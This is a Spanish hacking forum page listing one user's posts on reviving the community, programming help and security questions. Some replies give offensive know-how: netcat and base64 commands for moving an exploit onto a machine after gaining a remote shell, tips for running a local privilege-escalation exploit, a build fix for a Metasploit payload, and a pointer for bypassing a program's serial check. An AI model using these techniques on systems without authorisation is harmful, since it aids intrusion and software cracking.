Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - animanegra

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 83

Retroalimentación / Re:hackxcrack de antaño

« en: Mayo 28, 2020, 09:52:24 pm »

Pues yo haría varias cosas:

Que se podía poner en este post la lista de gente simpemente para saber quien se apunta.
Que estaría bien hablarlo por MP para que los temas a tratar en la revista no salgan hasta que la revista no salga.
Que estaría bien una correccion cruzada, los que hacen artículos corrigen el artículo de otro (Y que no haya enfados cuando te corrigen algo. Se debate y se tira para alante).
Que estaría bien que alguien con conocimientos de maquetación metiese todo dentro del mismo libreto. Hacker fashion me suena que sabia de diseño y esas cosas (igual me equivoco).
Que estaría bien una figura de alguien que no escriba ni esté en el proceso de corrección que lea la revista antes de sacarla para dar las ultimas correcciones.
Que habría que marcar plazos y número de páginas de los artículos. Por ejemplo una revista al trimestre y 5 paginas de artículo.
Y que los articulos no séan un copy paste de ningun sitio de Internet.

Por otro lado, me apunto a esto si hay masa crítica suficiente para sacar al menos una primera revista.

Retroalimentación / Re:hackxcrack de antaño

« en: Mayo 28, 2020, 08:05:48 am »

Yo como ya dije en otro hilo, me apunto a colaborar en segun que cosas. Nuevas revistas, blogs, crear ctfs y similares me apuntaría. Pero tiene que haber una masa de gente dispuesta y que haga las cosas y que se empiece con algo liviano y se vaya viendo que tal.

Otros / Re:Forma eficiente de crear menú con submenú

« en: Abril 07, 2020, 01:21:04 pm »

Aprovecha la programación orientada a objetos y haz una clase llamada menu que tenga como atributos un titulo y una lista de opciones. Cada opcion te lleva a visualizar la instancia de un objeto de tipo menu o a ejecutar una funcionalidad. De manera que al final lo que tienes es un cumulo de instancias a objetos que cambiarán en sus atributos y las acciones a realizar en lugar de tener un switch enorme como el que tienes.
La idea es abstraer la idea de menu, y mirarlo desde el punto de vista de que un menu es un elemento que vas a poder mostrar, tiene una serie de opciones y que llevan a una serie de acciones.

Investigación de Malware / Re:Payload Metasploit C++ y Visual Studio. Problema dll

« en: Abril 04, 2020, 11:35:59 pm »

De nada para eso estamos.
un abrazo.

Investigación de Malware / Re:Payload Metasploit C++ y Visual Studio. Problema dll

« en: Abril 03, 2020, 10:39:27 am »

Mira a ver si se soluciona simplemente diciendo al compilador de visual studio que compile las librerias de otra forma.

propiedades->propiedades de configuracion->c/c++->generacion de código->runtime library y cambias el valor de "multi threaded" en lugar de "multi threaded dll".

Dudas Generales / Re:¿Qué pasa con el foro?

« en: Abril 01, 2020, 04:04:33 pm »

Hombre todos los foros no están muertos ni mucho menos. Lo de compartir conocimiento, pues no se, a mi me parece que es algo que puede hacer que exista otra gente que tire para alante y que puedan expandir ese conocimiento, después ellos colaboren también en la comunidad y que todos nos beneficiemos de ese nuevo conocimiento. Al final entre todos podemos hacer más cosas que de forma individual.
Pero vamos, que ese sentimiento de que se aporta y cae en terreno arido, creo que es compartido por muchos. ^^

Programación Web / Re:Manual Oficial de PHP

« en: Marzo 27, 2020, 10:49:38 pm »

Y ir a la pagina oficial y leer de ahi el manual oficial??

https://www.php.net/manual/es/

Dudas Generales / Re:¿Qué pasa con el foro?

« en: Marzo 27, 2020, 11:34:12 am »

Pues igual es cuestion de buscar sangre nueva. Volver a los inicios y generar algun curso de hacking básico nuevo para tener entrada de gente que pregunte sobre el curso, las prácticas, etc...

Se podría plantear que cada mes generar algo parecido a la revista con cosas básicas con prácticas y volver al formato actividades y prácticas. Eso es lo que dio a hackxcrack la fama.

Dudas Generales / Re:¿Qué pasa con el foro?

« en: Marzo 27, 2020, 12:15:35 am »

Yo si hay gente que este dispuesta a reactivar y hacer material, comentar ideas, cosas me parece guai continuar. Se podrían plantear proyectos o alguna cosa. Algun blog, retos o cosas así. Revivir hackxcrack estaría guai.
La verdad es que de un tiempo aqui, ya todo estaba muy parado. Me moví hacia underc0de y en menor medida elhacker. Pero me parece bien y de hecho me gustaría si seguis por aqui gentes de bien volver a reactivar y andar mas activo. La verdad es que me doy paseos de vez en cuando para ver si veo a algun legendario por aqui, pero la verdad es que llevo tiempo sin ver muchos aportes ni temas en los que comentar.
Si la gente se anima a darle un poco de vida, yo me uno también.
El tema es cuanta gente estaría dispuesta a hacer cosas, o preparar temas para comentarlos para volver a dar vida a esto.

Cracking / Re:Hackear SSL. Ayuda

« en: Julio 26, 2019, 12:49:19 pm »

Cita de: rulas en Julio 22, 2019, 04:13:55 pm

Hola,

Soy ingeniero de telecomunicaciones, y me estoy metiendo en el mundillo de la seguridad y el cracking web. El caso es que estoy intentando crackear
una web en la que el unico puerto abierto es el "443/tcp open ssl/ssl Apache httpd (SSL-only mode)" y estoy un poco perdido. Es posible hackearlo?

Hola, soy repartidor de butano. Por la información que das es un servidor apache por lo que será un servidor web. Los fallos que puedes explotar con esa premisa (si es que los tiene) son fallos del sistema operativo a nivel de driver, si tiene puesto un firewall fallos del firewall, fallos del servidor apache, y fallos en los sistemas web programados probablemente en php, ya que se trata de un apache. Si el apache utiliza un sistema de almacenamiento de bases de datos tambien puedes intentar ataques a la base de datos.
A partir de ahi a aprender. Que tengas esos vectores de posible ataque no quiere decir que sea vulnerable si no que si hay algo mal configurado o programado y los fallos lo permiten podrás hacer algo. Bueno y si tienes
acceso físico al servidor tambien tienes ese vector de ataque.

Contestar a si es posible hackearlo pues dependerá. La información que das es tan genérica como decir, hay una caja fuerte y tiene una puerta ¿Es posible entrar en ella? bueno pues depende...

modo paternalista on...

Por otro lado, mas te vale que el sistema al que quieres entrar sea tuyo o te hayan dado permiso. Si no, despues vienen los lloros. Por norma aqui cuando se hacen esas preguntas se da por supuesto que
el sistema es tuyo o tienes permisos tenlo en cuenta, porque las técnicas que te podrán decir puede que ayuden a verificar la seguridad, serán tecnicas de pentesting que no van en la dieccion de hacer cosas ilegales.
Por analogía, te pueden decir que tires un ladrillo a la ventana de una tienda para llevarte algo de dentro, pero evidentemente si no tienes permiso del dueño de la tienda o la tienda no es tuya no es muy
buena idea aunque sea una forma sencilla de llevarte lo que deseas de la tienda.

modo paternalista off...

¿Sabes algo de servidores, de Linux (porque no se sabe que SO es el servidor, teniendo un apache por estadística probablemente sea un linux) y de programación de servidores?
¿Que hay en el puerto?¿Hay una aplicacion web?¿En que está programado? ¿Tiene sistema de login? ¿Cual es el sistema operativo del servidor físico? ¿Cuales son las versiones de los servidores, apache en este caso?
A partir de contestar a estas preguntas igual se te puede orientar.

un saludo.

Dudas Generales / Re:bbs

« en: Junio 11, 2019, 10:53:32 am »

Mira un poco por aqui:
https://www.fidonet.org/

Tienes una copia de las BBS de antaño en la url:
textfiles.com
Con monton de información parcialmente útil o inutil del todo.

Naa, es curioso ver todo eso.

Dudas Generales / Re:write up vulhub

« en: Junio 03, 2019, 10:08:32 am »

Deja el link de la iso de vulhub y si tiene tiempo alguien igual se la mira y te puede ayudar.

Hacking / Re:Escalado de privilegios

« en: Mayo 29, 2019, 02:51:54 pm »

Citar

únicamente tengo que indicar ./nombre_fichero, no?

Pues no se, mira la documentación del exploit específico. Pero normalmente un exploit de local privilege escalation te permite estando en el ordenador en una consola ejecutar el comando y que te abra una consola de administrador desde la que ejecutar comandos como superusuario.

¿Lo has compilado en el mismo kernel que la máquina objetivo? Mismo procesaor, etc... el exploit ese me suena que era solo para un kernel concreto y para 64 bits.

Hacking / Re:Escalado de privilegios

« en: Mayo 29, 2019, 10:12:01 am »

Cita de: sancand en Mayo 28, 2019, 10:56:02 pm

en el momento de ejecutar me indica Invalid argument. ¿Alguna idea?

¿Has probado a compilar el exploit de forma estática?

Citar

Buenas, podrías darme alguna pista de como copiaste el exploit, me he quedado en paso de tener una shell remota.

Para copiar un archivo de remoto a local tienes muchas opciones, desde un wget como te comentan, un scp si tiene instalado, utilizando netcat y una redireccion (ejecutas en tu equipo: nc -l -p PUERTO < archivo.exe y en el otro: nc TUIP PUERTO > archivo.exe). Puedes tambien abrir una consola ejecutar "cat archivo.exe | base64" y copiar y pegar de la consola para luego en la máquina remota donde tienes que poner "echo 'TEXTOCOPIADO' | base64 -d". Hay más opciones, pero estas son unas cuantas.

Cracking / Re:sacar el serial de registro para este programa hecho en delphi

« en: Mayo 15, 2019, 11:14:04 am »

No se si te servirá, pero hay por ahi un crackme explicado paso a paso con un programa en delphi. Igual puedes hacer un proceso parecido para saltarte la comprobación del serial que te pide.
https://backtrackacademy.com/articulo/resolver-el-reto-engendrito-con-el-decompilador-de-delphi

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 83